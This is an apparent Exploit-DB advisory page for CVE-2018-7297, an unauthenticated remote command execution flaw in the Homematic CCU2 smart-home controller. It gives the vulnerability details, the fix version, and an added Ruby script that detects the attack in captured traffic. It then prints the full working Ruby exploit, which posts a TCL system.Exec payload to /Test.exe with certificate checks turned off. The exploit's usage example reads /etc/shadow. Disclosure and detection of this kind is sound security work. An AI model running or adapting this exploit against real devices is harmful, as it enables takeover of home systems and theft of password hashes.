Vendor: Homematic CCU2
By: Patrick Muench, Gregor Kopf
CVSS: 8.8 (HIGH)
Type: Remote Command Execution
CWE: 78
Product Name: Homematic CCU2
Affected Version From: 2.29.23
Affected Version To: 2.29.23
Patch Exists: YES
Related CVE: 2018-7297
CPE: a:eq-3:homematic_ccu2
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2018

Homematic CCU2 Remote Command Execution

The vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Homematic CCU2. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Test.exe component, which listens on TCP port 8181. The issue lies in the handling of a crafted POST request containing a TCL command. An attacker can leverage this vulnerability to execute code under the context of the webserver.

Mitigation:

Update to version 2.29.24 or later
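
Until the update is applied, requests of the shape described above (a POST to Test.exe whose body calls system.Exec) can be flagged in captured traffic or at a reverse proxy. The Ruby check below is an added example, not part of the original advisory or exploit script; the function names are assumptions, the sample requests are constructed, and the case-insensitive matching is a conservative choice rather than documented device behaviour.

```ruby
# Added example: flag HTTP requests matching the CVE-2018-7297 pattern
# (POST to /Test.exe whose body calls system.Exec). Function names and
# sample requests are constructed for illustration.
EXEC_CALL = /system\.Exec\s*\(\s*"((?:[^"\\]|\\.)*)"/i

# Split a raw HTTP/1.x request into method, path (query removed) and body.
def parse_request(raw)
  head, body = raw.split(/\r?\n\r?\n/, 2)
  method, target = head.to_s.lines.first.to_s.split(' ', 3)
  path = target.to_s.split('?', 2).first.to_s
  { method: method.to_s.upcase, path: path, body: body.to_s }
end

# Return a finding hash when the request matches, otherwise nil.
def detect_ccu2_exec(raw)
  req = parse_request(raw)
  return nil unless req[:method] == 'POST'
  # Case-insensitive path match: assumption, errs on the side of alerting.
  return nil unless req[:path].casecmp?('/Test.exe')
  match = EXEC_CALL.match(req[:body])
  return nil unless match
  { path: req[:path], command: match[1] }
end

# Scan many captured requests and return only the findings.
def scan(requests)
  requests.map { |r| detect_ccu2_exec(r) }.compact
end

# Constructed sample traffic (not real captures).
SAMPLES = [
  "POST /Test.exe HTTP/1.1\r\nHost: ccu2.example\r\n\r\n" \
  'string stdout;string stderr;system.Exec("id", &stdout, &stderr);WriteLine(stdout);',
  "GET /Test.exe HTTP/1.1\r\nHost: ccu2.example\r\n\r\n",
  "POST /Test.exe HTTP/1.1\r\nHost: ccu2.example\r\n\r\nWriteLine(\"hello\");",
  "POST /index.htm HTTP/1.1\r\nHost: ccu2.example\r\n\r\nsystem.Exec(\"id\");"
].freeze

if __FILE__ == $PROGRAM_NAME
  scan(SAMPLES).each { |f| puts "ALERT #{f[:path]} runs: #{f[:command]}" }
end
```

Only the first sample is reported; the extracted command string gives responders the triage detail for each hit.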

Exploit-DB raw data:

#!/usr/bin/ruby

# Exploit Title: Homematic CCU2 Remote Command Execution
# Date: 28-03-18
# Exploit Author: Patrick Muench, Gregor Kopf
# Vendor Homepage: http://www.eq-3.de
# Software Link: http://www.eq-3.de/service/downloads.html?id=268
# Version: 2.29.23
# CVE : 2018-7297

# Description: http://atomic111.github.io/article/homematic-ccu2-remote-code-execution

require 'net/http'
require 'net/https'
require 'uri'

unless ARGV.length == 2
  STDOUT.puts <<-EOF
Please provide the URL and the command to execute on the Homematic

Usage:
  execute_cmd.rb <url> <homematic command>

Example:
  execute_cmd.rb https://192.168.1.1 "cat /etc/shadow"

  or

  execute_cmd.rb http://192.168.1.1 "cat /etc/shadow"

EOF
  exit
end

# The first argument specifies the URL and if http or https is used
url = ARGV[0] + "/Test.exe"

# The second argument specifies the command which is executed via tcl interpreter
tcl_command = ARGV[1]

# define body content
body = "string stdout;string stderr;system.Exec(\"" << tcl_command << "\", &stdout, &stderr);WriteLine(stdout);"

# split uri to access it in an easier way
uri = URI.parse(url)

# define target connection, disabling certificate verification
Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == 'https', :verify_mode => OpenSSL::SSL::VERIFY_NONE) do |http|

  # define post request
  request = Net::HTTP::Post.new(uri.request_uri)

  # define the request body
  request.body = body

  # send the request to the homematic ccu2
  response = http.request(request)

  # print response to cli
  puts response.body
end